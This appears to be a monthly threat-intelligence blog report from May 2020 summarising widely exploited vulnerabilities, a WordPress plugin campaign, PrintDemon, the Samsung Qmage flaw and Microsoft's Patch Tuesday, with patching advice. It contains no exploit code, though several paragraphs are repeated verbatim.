This report provides an overview of trends in vulnerability disclosures and announcements on a regular basis. Where applicable, the report will provide knowledge of known exploits for trending vulnerabilities and relevant courses of action. This report is not exhaustive in nature and as such, will not include every vulnerability announced that month.
Key Findings
- The Department of Homeland Security (DHS), Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) jointly posted a list of the top 10 most routinely exploited vulnerabilities in recent years.
- Microsoft addresses 111 Vulnerabilities as part of their May 2020 Patch Tuesday advisory.
- An unknown Threat Actor targeted vulnerabilities in over 900,000 Wordpress websites in the first week of May 2020.
Analysis
Exploitation of Vulnerabilities
FBI Top Vulnerabilities Exploited
FBI Top Vulnerabilities Exploited
In May 2020, the Department of Homeland Security (DHS), Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) jointly posted a list of the top 10 most routinely exploited vulnerabilities in recent years.
Some of the vulnerabilities on the list are made more relevant by most companies shifting to a working from home structure as part of their response to the COVID-19 pandemic. With companies having to quickly adopt and adapt these new measures, employee home security and cloud based infrastructure could lack proper secure configuration, consequently widening the attack surface for threat actors.
The top ten vulnerabilities listed were exploited routinely throughout 2016-2019, with one published as long ago as 2012. This speaks to the security posture and lack of patching adoption by most industries.
Two of the top ten flaws, CVE-2017-0199 and CVE-2017-11882 , were discussed in the report EclecticIQ Pandemic Intelligence Update April 14 2020 to be part of threat actors' tool set to exploit victims using COVID-19 themed attacks.
The discussed vulnerabilities are still being exploited because the attack surface is extremely large, as the flaws are found within commonly and widely used software. Once organizations update their security posture the industry should see a decline in these types of attacks.
- Course of Action: Review report Published by DHS, CISA and FBI
Campaign Targeting WordPress Websites
In the first week of May 2020, an unknown threat actor targeted over 900,000 WordPress websites in a campaign attempting to exploit various vulnerabilities. The threat actors targeted Cross-Site Scripting (XSS) as well as other vulnerabilities to initially compromise the sites and ultimately redirect visitors to malvertising sites.
Wordpress plugins have been subject to many vulnerabilities, subsequently increasing the attack surface of user systems. In this specific campaign the threat actor targeted the Easy2Map, WP GDPR Compliance and Total Donations plugins as well as Blog Designer and Newspaper theme. All these technologies have been patched against the flaws that were under attack, some in more recent months but others, such as the Newspaper Theme, was dressed as far back as 2016.
This attack speaks to the slow adoption of security updates as well as the wide attack surface. If threat actors are targeting old vulnerabilities, they are still seeing a return on investment.
The details surrounding the vulnerabilities are unknown, but users are recommended to keep all WordPress software and related plugins up-to-date and remove all plugins that are no longer supported.
Newly Discovered Vulnerabilities
CVE-2020-1048 (PrintDaemon)
A vulnerability in the Windows Printing Service could be used to escalate privileges in Microsoft Windows versions going back as far as 1994 with Windows NT 4. The flaw, dubbed PrintDemon, can be found in the Window Print Spooler, the Windows component managing printing operations.
Security researchers Alex Ionescu & Yarden Shafir published a report stating that the component could be used to hijack the Printer Spooler internal mechanism, consequently enabling a local privilege escalation (LPE) exploit. This means that vulnerable machines can not be exploited remotely, as the attacker needs to have local access to perform the exploit. A Proof-of-Concept (PoC) exploit can be found on Alex Ionescu's Github .
The PrintDemon vulnerability is tracked as CVE-2020-1048 and has been patched as part of the Microsoft May 2020 edition of the patch Tuesday Advisory.
In the first week of May 2020, an unknown threat actor targeted over 900,000 WordPress websites in a campaign attempting to exploit various vulnerabilities. The threat actors targeted Cross-Site Scripting (XSS) as well as other vulnerabilities to initially compromise the sites and ultimately redirect visitors to malvertising sites.
Wordpress plugins have been subject to many vulnerabilities, subsequently increasing the attack surface of user systems. In this specific campaign the threat actor targeted the Easy2Map, WP GDPR Compliance and Total Donations plugins as well as Blog Designer and Newspaper theme. All these technologies have been patched against the flaws that were under attack, some in more recent months but others, such as the Newspaper Theme, was dressed as far back as 2016.
This attack speaks to the slow adoption of security updates as well as the wide attack surface. If threat actors are targeting old vulnerabilities, they are still seeing a return on investment.
The details surrounding the vulnerabilities are unknown, but users are recommended to keep all WordPress software and related plugins up-to-date and remove all plugins that are no longer supported.
Newly Discovered Vulnerabilities
CVE-2020-1048 (PrintDaemon)
A vulnerability in the Windows Printing Service could be used to escalate privileges in Microsoft Windows versions going back as far as 1994 with Windows NT 4. The flaw, dubbed PrintDemon, can be found in the Window Print Spooler, the Windows component managing printing operations.
Security researchers Alex Ionescu & Yarden Shafir published a report stating that the component could be used to hijack the Printer Spooler internal mechanism, consequently enabling a local privilege escalation (LPE) exploit. This means that vulnerable machines can not be exploited remotely, as the attacker needs to have local access to perform the exploit. A Proof-of-Concept (PoC) exploit can be found on Alex Ionescu's Github .
The PrintDemon vulnerability is tracked as CVE-2020-1048 and has been patched as part of the Microsoft May 2020 edition of the patch Tuesday Advisory.
- Course of Action: Review May 2020 Microsoft Patch Tuesday Advisory
Qmage Vulnerability in all Samsung Devices since 2014
Google security researchers discovered a vulnerability that impacts all Samsung smartphones sold since 2014. The flaw resides in how Android OS handles the custom Qmage image format (.qmg). A security researcher with Google's Project Zero bug-hunting team (Mateusz Jurczyk), discovered a way to exploit how Skia (the Android graphics library) handles Qmage images sent to a device.
The flaw is described as a 0-click vulnerability, meaning that no user interaction is required for exploitation to be successful. A PoC exploit was demonstrated by the security researcher showing the successful exploitation by sending repeated MMS (multimedia SMS) messages to a Samsung device.
The vulnerability, tracked as CVE-2020-8899, was discovered in February and was reported to Samsung. The flaw was patched as part of the May 2020 Android Security Updates advisory.
Google security researchers discovered a vulnerability that impacts all Samsung smartphones sold since 2014. The flaw resides in how Android OS handles the custom Qmage image format (.qmg). A security researcher with Google's Project Zero bug-hunting team (Mateusz Jurczyk), discovered a way to exploit how Skia (the Android graphics library) handles Qmage images sent to a device.
The flaw is described as a 0-click vulnerability, meaning that no user interaction is required for exploitation to be successful. A PoC exploit was demonstrated by the security researcher showing the successful exploitation by sending repeated MMS (multimedia SMS) messages to a Samsung device.
The vulnerability, tracked as CVE-2020-8899, was discovered in February and was reported to Samsung. The flaw was patched as part of the May 2020 Android Security Updates advisory.
- Course of Action: Apply Updates From Android Security Bulletin - May 2020
Patched Vulnerabilities
Microsoft patch Tuesday May 2020
Microsoft addresses 111 Vulnerabilities as part of their May 2020 Patch Tuesday advisory. The advisory spans across 12 different products, including Microsoft Edge, Windows, Visual Studio and the .NET Framework.
Significantly, this edition of the Patch Tuesday Advisory does not include any previously exploited 0-day vulnerabilities.
Some of the more notable and severe vulnerabilities in the advisory include:
- CVE-2020-1023 - Microsoft SharePoint Remote Code Execution Vulnerability
- CVE-2020-1024 - Microsoft SharePoint Remote Code Execution Vulnerability
- CVE-2020-1102 - Microsoft SharePoint Remote Code Execution Vulnerability
- CVE-2020-1096 - Microsoft Edge PDF Remote Code Execution Vulnerability
- CVE-2020-1051 - Jet Database Engine Remote Code Execution Vulnerability
- CVE-2020-1174 - Jet Database Engine Remote Code Execution Vulnerability
- CVE-2020-1175 - Jet Database Engine Remote Code Execution Vulnerability
- CVE-2020-1176 - Jet Database Engine Remote Code Execution Vulnerability
- CVE-2020-1067 - Windows OS Remote Code Execution Vulnerability
- CVE-2020-1064 - MSHTML Engine Remote Code Execution Vulnerability
- Course of Action: Review May 2020 Microsoft Patch Tuesday Advisory
Recommendations
EclecticIQ Fusion Center recommends to apply security updates to affected systems as soon as they become available, in order to mitigate against the risks posed by the vulnerabilities mentioned in this report. This report is a summary of the main vulnerabilities EclecticIQ analysts have seen over the course of a month and as such is not reflective of the full list of CVE information published by vendors.
Users should ensure they update their dependent systems even if they are not mentioned in this report.
Users should ensure they update their dependent systems even if they are not mentioned in this report.
We hope you enjoyed this post. Subscribe to our blog for more interesting reads on Cyber Threat Intelligence or check out our resource section for whitepapers, threat analysis reports and more.
